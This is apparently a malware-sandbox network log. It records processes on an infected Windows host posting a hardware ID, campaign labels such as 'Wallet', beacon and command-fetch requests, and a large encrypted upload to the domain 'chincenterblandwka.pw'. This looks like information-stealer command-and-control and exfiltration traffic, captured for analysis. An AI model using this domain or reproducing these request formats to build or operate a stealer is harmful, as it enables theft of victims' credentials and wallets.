{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0W7TXPq58AenSGUeOM%2FW60jlp4r%2FZrnC43FIjIGuV3F6tyJ7vFLcC%2BiafMmX8GbG9oKwCdVgKs2VJotfSWUS35QzYjyWGF5Y6dzBsBs7Ir3PiD%2Fkld7bWC3J7YegyLeAireySMla9sw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae2ab914623-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:57:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:52 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 795 Host: chincenterblandwka.pw
2023-12-27 16:57:52 UTC	795	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:58:00 UTC	1331	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p10bl6gnef1jmn96n6rs6figuv; expires=Sun, 21-Apr-2024 10:44:37 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L05hMdgNkH6I4%2FF%2FiwPElcLLgFTQIUR8fg9XhVedC%2Fp25D7b6L3oM8hRNtg1VIO22P2BAJSF5eRjWMQeMbW3V5lGGmpNknaOyalDc6NZ3PbWF8oXiXF%2FaF1d46mO9oguUlpFWw%2FHLuM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae94931479d-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: fok 212.102.41.2
2023-12-27 16:58:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49781	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:01 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 407702 Host: chincenterblandwka.pw
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 3d a4 12 df ac 8a cf 98 ca 55 ff 52 aa c0 06 20 aa b6 b8 bc d0 3c e8 2d 31 a5 49 3f 46 77 e2 18 9e 62 82 0e 5b f2 3b 75 7c ff ae 20 2e f4 15 6a 6c 7f 99 03 13 39 72 db 76 09 ff 74 a0 61 19 a1 27 6c 94 7f bc fb b8 4b 34 c6 6d 6d 5f 3f 77 e6 b0 ef 04 12 83 5a 64 c6 46 a7 72 a4 1f 8b e4 ce 25 ef 33 56 d2 e1 7f d6 a1 19 4d 1e ec b4 dc ef b6 e5 59 34 8d 9a 95 fa e9 a7 4e 29 fe 57 11 13 9a dc 18 2d f9 c3 57 b3 45 67 af 87 69 56 0b aa c1 44 43 61 fe d4 70 e1 80 f4 85 9a 14 4e 4e 2c d9 d6 a2 33 c8 a8 66 d7 4d 48 4d 5d fd 08 8c 27 42 1b 2e 5d 7c 6e 81 a2 36 68 3b 04 0e a1 87 71 b2 73 6f 84 c1 38 df 3e cc 31 90 df 65 ac 04 be 62 57 21 07 f8 2b 6e 53 e0 02 cb 6a 3b 2e 3c 2a 09 9a 54 60 6d 05 ef bb 05 95 a1 37 5f 74 30 0c 7f 22 dc 13 05 4f 4b 31 6e 07 82 9e 82 ef 91 Data Ascii: =UR <-1I?Fwb[;u\| .jl9rvta'lK4mm_?wZdFr%3VMY4N)W-WEgiVDCapNN,3fMHM]'B.]\|n6h;qso8>1ebW!+nSj;.<*T`m7_t0"OK1n
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 33 d1 90 88 90 dc cf 2e 7a 6c e4 b9 e5 19 1d 54 fc 61 2c 06 02 7d a7 d4 8a b4 04 49 22 14 0f 9c 0c f1 a2 14 fd 00 5c e4 08 64 a2 e1 84 e5 70 eb 92 58 ca 99 5f 18 bc 4c 92 e6 0b 4e 8c 5b 74 a8 55 78 81 cf 80 e5 8a e3 bd 91 f4 e7 e7 3b c2 9c c4 72 bb 05 09 1e 92 ab 67 21 ee 91 6a af 13 97 4c e9 de 8a 96 63 b3 64 de 45 bf bd 58 d8 ea db d9 d9 76 ab b8 c5 89 53 56 5d b9 e7 1f 20 63 7c c7 e6 69 60 bb 4b 5e f4 b2 40 bc 39 43 e3 43 87 bb a1 66 5b 61 df c3 28 7f 85 47 32 c5 15 d0 5d f4 83 b8 2b 45 06 68 1d b9 e3 e7 b5 6c a5 b6 75 95 3a a7 89 e5 b6 e6 45 17 fd 80 1f 7b 93 70 53 b7 2c 1f 33 03 46 33 0c b0 ae 05 b4 be 5d c7 af c8 84 0d 56 a2 06 22 68 34 41 9a 68 32 d1 a2 df d5 5f 9a 43 82 94 ba fc a9 a6 e4 19 5f f2 77 e6 f8 fa a2 27 ab 52 63 ce 1d 13 a9 0e 15 bf 57 Data Ascii: 3.zlTa,}I"\dpX_LN[tUx;rg!jLcdEXvSV] c\|i`K^@9CCf[a(G2]+Ehlu:E{pS,3F3]V"h4Ah2_C_w'RcW
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 4e fd d3 0c 1e 8f 22 f4 ca 4b ec 3c ef 3f f3 33 4e fb 8c b9 5e 03 e5 b5 bb c5 5e cb 72 50 f4 de 89 88 6c 50 c3 c7 5b 7d 1f 65 ce b3 eb 1b ce 21 ef fd 20 2b f0 ef 03 43 21 52 bf 10 31 0d 7d ef 77 eb c8 35 c7 0a 1c dc e5 7c 56 93 2f 96 30 df 52 7c 73 7a fa ce c4 c3 55 35 89 9a d2 d4 14 ab 1f cd 56 dc 93 02 28 08 ba e0 c1 df 1e c5 39 b0 77 5f 97 51 5a ff a8 62 d2 4c b3 60 6f 88 52 a7 61 62 b3 1b 47 78 16 60 24 96 de 10 f5 2f a6 58 1e 5d 5c f1 19 29 16 dc f1 6f 2c 0b 51 a5 7c ce e5 a7 ca 74 a5 1f 24 a3 02 0b 52 69 93 13 7d a0 99 02 07 7f bd ba 88 9f 9f 8c 91 85 fd 78 1a 7f 59 ef 35 88 fe db 63 d0 b7 3c 63 f4 a9 1f fd 42 16 de 28 61 ce 55 7c 0d aa 79 0c d7 b4 fd 03 74 64 08 1e 59 50 3a 36 54 55 1c 99 c5 68 5c 86 cc 36 29 ec be df 78 34 fc 11 a6 0f 3f 90 16 c0 Data Ascii: N"K<?3N^^rPlP[}e! +C!R1}w5\|V/0R\|szU5V(9w_QZbL`oRabGx`$/X]\)o,Q\|t$Ri}xY5c<cB(aU\|ytdYP:6TUh\6)x4?
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: c3 7c c4 08 1d c1 a3 65 b9 7f 75 57 1e a4 2c 1f 39 e0 34 b7 94 2d f1 e7 7a 0d 22 b9 24 99 4f 20 7a 0b 87 1c 2b dd 23 c0 ec be e7 6a 2f 88 ef 83 31 01 dd bd c2 64 e9 b0 20 b9 b5 82 7d c6 e5 b8 40 08 78 5b 12 59 45 2b fd 5b ce ed f4 a4 1c f1 3b dd b5 83 52 1b 1e 03 88 a1 69 0c ee c6 3d 6e 54 b7 c5 02 40 48 bf d5 7e cf 35 05 8f 2a d8 9e 74 ca 77 e3 9c 9d 7a 1b fd 80 e2 47 85 98 bd 98 b6 43 8e c2 68 68 41 8d 79 3a 31 9d c1 6b 2d 68 3c 5e d9 96 97 19 5b 8e 09 88 5e 9d 70 23 61 03 ed 5b b9 42 e0 fc d6 aa 5f 62 d8 00 0f 14 a3 ea 6b ab 7f 08 92 98 ad f5 36 56 48 2c e4 e1 23 18 24 e9 13 b5 bd 46 f6 ca 4a fb 50 2f b5 ac 2d 48 63 00 b3 5a 2d 4e 24 4c 46 63 f3 b9 87 af f3 b8 1f 35 c4 a0 d7 fa c3 5e ae f6 8b 1a 95 4a ce 3c 49 88 cc 80 86 7b c9 f2 e8 1d 98 cf 20 81 66 Data Ascii: \|euW,94-z"$O z+#j/1d }@x[YE+[;Ri=nT@H~5*twzGChhAy:1k-h<^[^p#a[B_bk6VH,#$FJP/-HcZ-N$LFc5^J<I{ f
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: f4 40 19 e0 05 bc 98 95 be 40 89 fe df de 59 ba 49 a4 84 40 c3 15 ee aa 6e f1 2f f4 4c f2 5a f7 38 5b 81 2a 9c ef a8 2f 07 52 53 66 1c 15 2a 4f 72 a4 c2 60 24 6b 9b 97 18 4b 33 c7 37 69 06 a5 ff 88 4f 70 68 33 30 a8 ad 6c 4b 26 d7 6a b5 e0 23 5c 66 bb 9f 06 59 e2 27 27 38 12 8e 69 e8 f0 63 2b f1 13 2e 08 8a 43 99 9f e7 03 d1 cf 68 1b fc f3 64 0a 3d 9c 1f 0c 49 f0 c0 2f e6 a3 e3 c9 31 af 98 0b 71 c5 1f b4 b5 b1 70 34 74 b0 00 f8 ea fa 87 86 c3 47 78 1e 1d 23 e2 80 ea 43 88 e1 ab 03 6e 08 f8 bd 87 e8 bd e4 32 e5 ad 46 31 2e 2d b8 33 91 cb 7e 58 a5 81 fd 46 b9 46 66 5c 23 17 ba 8f d4 82 8e 3e 67 f8 0a aa 88 c3 6e 67 66 ec 99 0f d0 dd 0a 3f 9c 1a 73 67 38 e8 90 42 ce c8 50 2a b9 ac d7 f0 c3 35 d7 3e 99 b9 be 22 ed 3e 09 e7 e1 aa ed 76 d3 5c 75 60 16 69 90 f0 Data Ascii: @@YI@n/LZ8[/RSfOr`$kK37iOph30lK&j#\fY''8ic+.Chd=I/1qp4tGx#Cn2F1.-3~XFFf\#>gngf?sg8BP*5>">v\u`i
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 05 2c 33 e8 f2 8a e2 f7 08 7d e2 47 ff 24 f7 6c 9c 05 59 f3 64 e1 30 27 a5 68 2c 8c f1 4f 62 25 9e 42 b7 a1 f4 6d d8 8f 4f ed 71 57 c6 86 58 b3 d3 05 c9 16 eb a1 0a 57 43 23 60 14 ce d5 3f 1a 1d 16 45 4e ba bd bc 1f bc fe d9 aa af 1b 1a 34 cd 57 7f 62 ac 76 20 03 8e 67 98 3a 54 26 0b 65 09 d9 61 c3 06 32 49 88 38 22 7e 33 d8 39 9f 60 84 af c3 9f a6 f3 7e e5 88 1b 0f d5 f9 a4 9d 73 b1 5c 4a b0 24 d4 f0 1c 45 81 f5 07 9c 43 6b 02 2b 59 09 8b 47 3d 44 87 12 3d f6 bf 2f 7c 20 4e 17 5c 14 54 8b 57 a1 f3 2d 09 af ee 5c de b0 ed b5 ab 8d b0 30 62 1b e9 fe 68 65 f7 e2 88 6c 4b 69 14 35 ef 10 78 7d 58 8d 30 bf b4 52 62 61 9f da 10 ee 9d e7 a6 18 07 91 be 92 cd b6 a0 8f db 89 06 fc 8b 39 1b cc 05 3e 50 bb 89 cb ff 7c 98 23 36 dc 98 3a 2c 1e 3c cb 4e 35 e6 4e 1d 3e Data Ascii: ,3}G$lYd0'h,Ob%BmOqWXWC#`?EN4Wbv g:T&ea2I8"~39`~s\J$ECk+YG=D=/\| N\TW-\0bhelKi5x}X0Rba9>P\|#6:,<N5N>
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 33 0b f2 4c ba 0e 5e 77 16 9e dd cc fb 5e 42 ab 3a 49 cd 2d 12 12 86 fe 9c c9 45 49 f7 c4 0c b5 8a 82 94 cd e3 af 0c 77 e0 1a 2d f1 32 ae 0c 14 86 1b 23 a4 60 a5 60 1c e4 2a e1 a1 64 31 d7 e0 53 47 29 c7 0a 83 9b 5c f9 b9 e4 19 0a c5 5d 1b 30 3f 0f 84 dc 3b 08 57 89 6a eb 0b c2 f3 d8 70 fb d1 63 ee 37 26 f5 2f b9 63 6f 7f 66 29 69 04 12 7b 1a 0b e2 2f 5f 24 98 65 86 cc 97 b1 77 1f cf bb 4d 1b d8 ae bf 05 fc d0 d5 84 8e 31 73 ac 4d a3 11 23 2f ef c5 cd 96 12 ac 8f a8 76 be 24 71 c1 54 85 cc a2 89 b4 ee 9c fb 2e 1b 5e 82 b7 c8 08 77 9a 78 dc 36 84 b0 ab c2 af 7a cb 1b 1b 03 aa 95 3d 14 3b 58 73 d9 9b 5a 4d 3d 33 22 5f b0 9d c7 73 02 51 c1 f7 58 f0 1d d8 5b 4c 1f 0b 82 af 65 69 4a 3d 56 2f 54 72 89 73 29 6a 79 3e 4a 5c 48 67 3f 00 ac 52 43 40 ea 34 99 be a5 Data Ascii: 3L^w^B:I-EIw-2#``*d1SG)\]0?;Wjpc7&/cof)i{/_$ewM1sM#/v$qT.^wx6z=;XsZM=3"_sQX[LeiJ=V/Trs)jy>J\Hg?RC@4
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 82 94 d0 f9 e9 56 7e 4b 98 06 25 72 b5 3e 6f 21 ee 59 d2 37 42 34 65 66 43 56 eb 3e 4e 5d 86 65 dc 41 77 3f f6 d1 cf 03 9b 12 ba 8a 09 b3 55 f4 f6 52 c0 dc 62 a1 5e 46 d9 04 b3 ce 18 71 2e 97 74 d1 a7 c3 32 fe 8d ae 7a bb fc af 10 3c 0d d3 72 7c 74 64 c1 bd 12 14 9a 9e b4 49 46 a1 68 1b 11 5c 46 f3 0d db 7f 59 5e 6b 82 7e 7a 7f b6 c8 73 fa 14 eb 0c 31 f5 0f 17 5a 78 42 51 8a a2 73 c9 64 3a a9 1f ee bd f4 98 8a b9 58 93 d5 f3 f7 7b 45 09 0c 31 bc 13 aa 65 bf 75 6c 42 d4 2a f3 dd ec 55 95 5d 89 e6 b7 f9 cf 7a 17 ba a3 34 36 de 9f a4 f6 37 4e ae 4e 31 63 8f a7 24 cf 15 e8 85 ec ff 7e 35 5c 6a b6 72 ea dd 6e c4 81 8b 66 f6 c8 b4 8b 83 7b d1 1f ac db b7 92 a7 f4 76 b9 50 6a 1e 5b c3 99 33 63 3a e7 39 ec b7 9d 88 89 b6 81 ea 9f 9e e5 7e 38 a3 57 13 13 be fb 05 Data Ascii: V~K%r>o!Y7B4efCV>N]eAw?URb^Fq.t2z<r\|tdIFh\FY^k~zs1ZxBQsd:X{E1eulB*U]z467NN1c$~5\jrnf{vPj[3c:9~8W
2023-12-27 16:58:01 UTC	15331	OUT	Data Raw: 01 e8 c7 fc 7f 32 77 7c 8c ae 72 b6 ed f8 33 1a 88 d1 a1 98 96 39 d6 4c ad 33 a6 9a 1a 72 79 bb 25 c2 96 e2 af b9 e7 9d ff 95 da e2 7d 46 66 ae e0 52 3a 3a 38 a1 25 72 85 a4 05 33 d5 5c c2 21 d4 4f 87 98 30 7f ce ed a7 e7 ae e3 d1 38 53 6e 2e 05 85 39 ed 37 17 58 33 5f a7 3b 33 84 e7 c4 ab 82 2c 77 ca 0c 89 c0 06 4b 78 b4 30 40 3e 02 ee 8e bc e1 84 e0 29 76 3e 75 f6 b3 f3 a6 9b 26 78 4e 17 e7 f0 7b e5 ce 80 5b ba a6 fb 81 c3 fe 8f fb 24 c2 c6 d3 29 49 eb 6b 3f 09 b8 69 00 a9 94 af ed 5d f3 51 ad 75 e2 79 20 36 32 78 fa c1 06 29 ce 55 53 e8 29 5c 3c 76 12 57 27 5b da b3 9f e9 18 9f b7 c8 cc c7 83 ce 83 10 aa f9 12 ec 3b 9e 85 ab 14 22 54 0e c6 98 60 11 c3 22 fc 91 65 1e 89 1f a0 d8 49 f4 70 63 c0 51 29 6e 68 fc 84 41 81 30 d0 7d ee 33 26 e8 de 46 33 5c 2f Data Ascii: 2w\|r39L3ry%}FfR::8%r3\!O08Sn.97X3_;3,wKx0@>)v>u&xN{[$)Ik?i]Quy 62x)US)\<vW'[;"T`"eIpcQ)nhA0}3&F3\/
2023-12-27 16:58:04 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ft98cd66shak835637i6oje68b; expires=Sun, 21-Apr-2024 10:44:41 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SQzxIWXBz9HNFJWyVKlkqNbFoJgadtNrz%2BLV7iKGz4FN%2FITpVcTtx68eE5n2ttB1JrgaKcePoqmugK6UEPrIsgMyJrLBMNKHWc5B0N6mVtLWAPE%2F2SYUkuhXuAYBIr5puYe%2BptXi10E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b1e89f53ad2-DFW alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49780	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:02 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: chincenterblandwka.pw
2023-12-27 16:58:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2023-12-27 16:58:02 UTC	1329	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cdiqrcmsqsrce6f20hm88porun; expires=Sun, 21-Apr-2024 10:44:41 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AST3RFcKDuWS2%2FvEOay5TgpypXU6Ky%2BWpYXyw94eaqHbdTwd8EEw8y%2BYxwczOZM0sxRtATMjMaPDz8hLy3f9HRVnNVGIaNCMS12afd2FgTu7OdZ6%2FyXSgcGojFeugr4YntDP9B8IssI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b236fd4e843-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2023-12-27 16:58:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49787	172.67.176.11	443	7832	C:\Users\user\AppData\Local\Temp\ABF7.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:58:03 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 55 Host: chincenterblandwka.pw
2023-12-27 16:58:03 UTC	55	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 76 42 76 56 39 2d 2d 57 61 6c 6c 65 74 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=HvBvV9--Wallet&j=default
2023-12-27 16:58:04 UTC	1325	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=47mbjvusl2a9vacvq53jvg5mao; expires=Sun, 21-Apr-2024 10:44:42 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oW0TvLwl0liAbj6AKByqxupoRZET6kpsqMwIOKOFmc0Syf4WCp0om%2FdH4BrpqxvpZOj57gq2tg7lUWyGQGILJVMULFBi76DBBED2OTTrnP0AoJoja71yv%2FH2NPDFQS5MbvHBNyoAvGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b2d2c75e847-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:58:04 UTC	44	IN	Data Raw: 32 64 30 62 0d 0a 71 63 71 65 41 65 30 64 62 6a 77 52 54 6e 38 55 73 7a 62 6f 2f 78 41 43 65 55 79 6f 6a 63 77 62 57 61 61 52 49 71 Data Ascii: 2d0bqcqeAe0dbjwRTn8Uszbo/xACeUyojcwbWaaRIq
2023-12-27 16:58:04 UTC	1369	IN	Data Raw: 44 38 74 51 48 53 78 35 51 68 7a 54 31 4f 48 6d 64 73 52 54 53 48 47 75 58 31 4d 43 4a 5a 62 49 72 2b 71 54 6c 6a 68 75 56 51 31 5a 6d 5a 44 4b 50 71 76 69 48 4e 50 77 39 59 4d 33 52 66 63 74 4a 61 6d 35 6f 38 44 33 4e 73 69 4b 33 73 4f 54 7a 65 73 78 69 41 70 37 67 4c 69 65 71 2b 49 63 30 39 46 54 45 62 62 6c 38 30 6b 78 62 49 33 7a 41 67 48 43 4b 4b 74 2b 77 35 50 4d 7a 7a 51 38 79 65 31 47 72 47 75 76 4a 69 68 58 45 4a 56 48 51 74 47 33 58 66 57 34 32 61 64 57 4d 54 49 73 48 67 70 48 5a 37 69 70 77 6f 67 4e 79 56 49 59 6e 71 76 69 48 50 65 42 51 65 4b 32 35 64 57 64 5a 43 69 62 4a 78 63 52 4a 75 70 59 66 73 4f 33 6d 47 73 51 4c 64 30 4c 67 4c 6f 4f 71 2b 65 75 41 58 5a 7a 55 7a 4b 78 45 32 69 52 62 4b 6c 58 35 75 48 69 33 46 36 4b 39 35 4b 63 76 7a 51 Data Ascii: D8tQHSx5QhzT1OHmdsRTSHGuX1MCJZbIr+qTljhuVQ1ZmZDKPqviHNPw9YM3RfctJam5o8D3NsiK3sOTzesxiAp7gLieq+Ic09FTEbbl80kxbI3zAgHCKKt+w5PMzzQ8ye1GrGuvJihXEJVHQtG3XfW42adWMTIsHgpHZ7ipwogNyVIYnqviHPeBQeK25dWdZCibJxcRJupYfsO3mGsQLd0LgLoOq+euAXZzUzKxE2iRbKlX5uHi3F6K95KcvzQ
